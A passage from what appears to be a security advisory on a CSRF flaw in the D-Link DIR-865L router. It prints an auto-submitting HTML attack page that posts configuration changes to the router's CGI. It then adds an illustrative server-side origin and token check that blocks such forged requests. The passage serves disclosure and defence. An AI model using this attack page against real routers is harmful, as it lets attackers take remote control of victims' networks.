-------------------------- Figure 2. Attack page 2. --------------------------
<html>
<head>
<title> D-LINK DIR-865L CSRF</title>
<!-- Firmware: 1.03 Fri 02 Nov 2012 -->
</head>
<body>
<form action="http://192.168.0.1/pigwidgeon.cgi" method="post">
<input type="hidden" value="SETCFG,SAVE,ACTIVATE">
</form>
<script>
document.DLINK.submit()
</script>
</body>
</html>
-------------------------- Figure 2. Attack page 2. --------------------------
At this point, the attacker can remotely administer, and thereby remotely control, the router.
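A server-side check that would refuse the cross-site POST shown in Figure 2, as an added example that is not part of the original advisory or of D-Link's firmware. The function names, token fields and sample requests are assumptions constructed for illustration.

```javascript
// Added example. Hypothetical server-side gate for state-changing requests
// to an admin CGI; names and sample requests are constructed for illustration.
const SAFE_METHODS = new Set(["GET", "HEAD", "OPTIONS"]);

// Constant-time comparison so a token cannot be recovered byte by byte.
function constantTimeEqual(a, b) {
  if (typeof a !== "string" || typeof b !== "string" || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Origin ("scheme://host[:port]") of a header value, or null if unparsable
// or opaque (sandboxed and data: pages report the literal "null").
function originOf(value) {
  try {
    const origin = new URL(value).origin;
    return origin === "null" ? null : origin;
  } catch {
    return null;
  }
}

// req: { method, headers (lower-case keys), formToken, sessionToken }
// allowedOrigins: origins the admin UI is legitimately served from.
function checkStateChange(req, allowedOrigins) {
  if (SAFE_METHODS.has(req.method.toUpperCase())) {
    return { allow: true, reason: "safe method" };
  }
  // Browsers attach Origin to cross-site form POSTs; fall back to Referer.
  const source = req.headers["origin"] ?? req.headers["referer"];
  const origin = source ? originOf(source) : null;
  if (!origin || !allowedOrigins.includes(origin)) {
    return { allow: false, reason: "origin missing or not allowed" };
  }
  // Same origin alone is not enough: require the per-session token as well.
  if (!constantTimeEqual(req.formToken, req.sessionToken)) {
    return { allow: false, reason: "missing or wrong CSRF token" };
  }
  return { allow: true, reason: "same origin with valid token" };
}

const ALLOWED = ["http://192.168.0.1"];
// Constructed: the POST a browser sends when a page like Figure 2 auto-submits.
const forged = { method: "POST", sessionToken: "constructed-token",
  headers: { host: "192.168.0.1", origin: "http://attacker.example" } };
// Constructed: the same POST sent from the router's own admin page.
const genuine = { method: "POST", sessionToken: "constructed-token",
  formToken: "constructed-token",
  headers: { host: "192.168.0.1", origin: "http://192.168.0.1" } };

console.log(checkStateChange(forged, ALLOWED), checkStateChange(genuine, ALLOWED));
```

The check only helps if safe methods never change configuration; any handler that acts on a GET has to be gated the same way.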
Recommendation:
--------------------------------------------------------------------------------
Vendor patch:
D-Link
------
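The vendor has not yet released a patch or upgrade. We recommend that users of this software check the vendor's home page regularly for the latest version: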